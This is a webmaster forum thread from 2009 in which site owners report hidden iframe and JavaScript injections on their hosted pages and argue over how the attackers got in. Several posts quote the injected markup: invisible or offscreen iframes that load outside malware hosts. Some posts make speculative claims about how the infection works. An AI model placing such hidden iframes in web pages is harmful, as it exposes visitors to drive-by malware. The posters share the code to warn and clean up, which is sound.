Anyone else had their Webair sites hacked yesterday?

[CunningStunt]

Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibilitydden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibilitydden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers.

[CunningStunt]

Just a head's up, check your sites. I've informed their registrar.

Had to submit 6 review requests to google as the sites have been royally fucked over.

[st0ned]

Wow, thanks for the heads up. I recieved an email from them saying that they had to move my server due to a "PDU error", didn't think to check my sites though. Going to scan through them now.

[Evil E]

Might also have to do with you and not the host.

Did you check your logs or talked to your host?

[st0ned]

No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

[thaifan99]

thanks for the heads up. checking now

[fallenmuffin]

Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.

[Babaganoosh]

Why do people still use webair? They're like the new dreamhost.

[CunningStunt]

Quote:

Originally Posted by st0ned

No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

That's a neat tool st0ned, thanks for that.

Yeah, I hear you Babaganoosh. I've just got so many domains, and it's a pain in the ass to source a load of new hosts that accept the kind of sites we make . I already deal with 16 different hosts as it is

[jollyperv]

Quote:

Originally Posted by st0ned

http://tools.pingdom.com/fpt

Awesome tool

[CunningStunt]

Heard nothing back from webair in 8 hours.

Great support. Not.

[MMarko]

Do you use some cms script or that were plain html pages?

[CunningStunt]

Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

[Dirty F]

I never seen a host getting so much complaints on here as Webair. Yet people always use them. Dont cry about shit if host with Webair. You can expect shit.

[tahiti]

Quote:

Originally Posted by CunningStunt

Fucking Iframe code added to the sites by this fucking asshole.

<iframe src="http://ruoo.info" width=1 height=1 style="visibilitydden;position:absolute"></iframe><iframe src="http://my2.mobilesect.info/" width=1 height=1 style="visibilitydden;position:absolute"></iframe>

You'd better check if you're with Webair, google is flagging the sites and preventing them loading. That's 30 sites I have to manually check now. Fucking asshole hackers.

"Fucking asshole hackers." I'd fucking bad admins! If there were better admin would have less hackers

[potter]

Quote:

Originally Posted by CunningStunt

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

Wow. Goes to show how much you know about web applications and scripting.

[CunningStunt]

This is the first problem I've had with Webair in 6 years, so you're talking shit as usual Troll boy. I thought you'd been banned permanently once and for all Frank?

[CunningStunt]

Quote:

Originally Posted by potter

Wow. Goes to show how much you know about web applications and scripting.

How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

[nico-t]

webair is one of te few hosts i avoid like the plague, about 1 thread a week about them.

[potter]

Quote:

Originally Posted by CunningStunt

How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

There are dozens of ways to gain access. They can hack a php or similar script running on your website. They can hack the server itself. They can hack the local network the server is located on. etc etc etc. Ten times out of ten it's a poorly written php script which is easily attacked to give the hacker access to the server files.

Seriously dude. Webmaster 101. You should know this shit already. Specially if you have your own dedi box.

[CunningStunt]

Thanks for the info potter, but they are basic sites, just html, handwritten, nothing running on them. No scripts to exploit.

I'm not a server guy. I write sites, and expect whoever hosts them to fucking do their job and look after them. I don't expect to have to look after server security as well as know how to SEO a site to beat 40 million others to a #1 keyphrase.

[xentech]

Quote:

Originally Posted by CunningStunt

Those were straight html pages.

It doesn't matter a crap what language they are in, someone has to get into the server in the first place to change the code on those sites, whether they be basic html, asp.net, php or whatever flavour.

[Violetta]

hmm... somebody complained about a site I posted last night! Gonna double check now!

[Dirty F]

Quote:

Originally Posted by Rockatansky

hmm... somebody complained about a site I posted last night! Gonna double check now!

Yeah that was me. No virus but it just sucked.

[pocketkangaroo]

Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.

[HorseShit]

lollllllllllllllll

[Cyber Fucker]

Nope, mine box was fine and it is fine now too

[spacedog]

Quote:

Originally Posted by pocketkangaroo

Anyone getting these again? Have a small virtual host account that has had all the sites hit. Running no scripts on any of these sites, they are strictly html.

You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files

[Shoplifter]

Quote:

Originally Posted by fallenmuffin

Yup.. has been happening to me for months. Got every site I had on webair blocked in google (google warning pages). They just fixed it on my server I guess.. they said they enabled security :| we will see..

I have another server at www.phatservers.com and not had that issue with them.

Are you using AT3?

[pocketkangaroo]

Quote:

Originally Posted by spacedog

You should run your antivirus scan on your machine if you loaded your own site and it had the iframes on your pages since those iframes load a virus which attacks SVCHOST.exe on your local machine and consequently corrupts your system32 files

Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.

[NaughtyRob]

I am not with webair but had mine hacked yes. iframe but different code.

[collegeboobies]

Quote:

Originally Posted by CunningStunt

How can they physically add code to my html pages, without either getting into my server's control panel, or ftp'ing to my account? It's impossible isn't it?

there are a shitload of exploits for most well known scripts people use

[notoldschool]

Quote:

Originally Posted by pocketkangaroo

Computer is clean. Haven't uploaded anything new in ages to the server. This actually wasn't an iframe being added but some javascript.

I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?

[mynameisjim]

Quote:

Originally Posted by notoldschool

I had 5 boxes hit with a superlong javascript on hundereds of domains. Any clue what they javascript does other than fuck up your page?

Can either be a simple redirect or a trojan installer.

[Major (Tom)]

Quote:

Originally Posted by st0ned

No problems on my end yet. If you haven't finished checking your sites, you can always use this tool. It loads your site from a remote location and tells you everything that it loaded, including iframes if there are any.

http://tools.pingdom.com/fpt

Its probally not the host. we had the same thing happen to us on one of our blogs and the guy who updates them had a virus. Only the blogs he updates got slammed

Duke

[notoldschool]

this is the first part of the pop you get from the virus that has infected webair servers.
ijabwif.com/cgi-bin

some boxes with norton catch the virus and some dont.
Webair is being VERY quiet about this for some reason.

[VladS]

All of my sites have been infected with a piece of js code on all the index files. The sites are on four different hosting accounts, the FTP passwords are not the same.

Yeah, basically i'm fubar. I'm expecting Google to take notice and ban the sites, and if that happens, well...

I don't quite understand how they got in on four different hosting accounts. Judging by the FTP logs, it seems it was some sort of script that inserted this code, because all files on all hosting accounts have been changed at the same exact time. 9.05.2009 - 12:24.

The hosts cleaned the sites, but a few days later, i've been hit again. It seems it is something on my PC that is causing this.

[V_RocKs]

Your PC? Highly unlikely...

[VladS]

This is the first code that was injected on my sites: (decoded version)

Code:

<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

The FTP logs:

Quote:

CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sat May 9 05:24:25 2009

FTP Logged in from:
Country: United States
Internet segment: 65.64.0.0/13
Internet Service Provider: SBIS-AS - SBC Internet Services

Quote:

CyberWurx login monitoring has detected the following account login from a new internet segment:

Date: Sun May 10 23:54:24 2009

FTP Logged in from:
Country: Germany
Internet segment: 81.169.144.0/20
Internet Service Provider: STRATO Strato AG

[seeandsee]

HI


fucked shit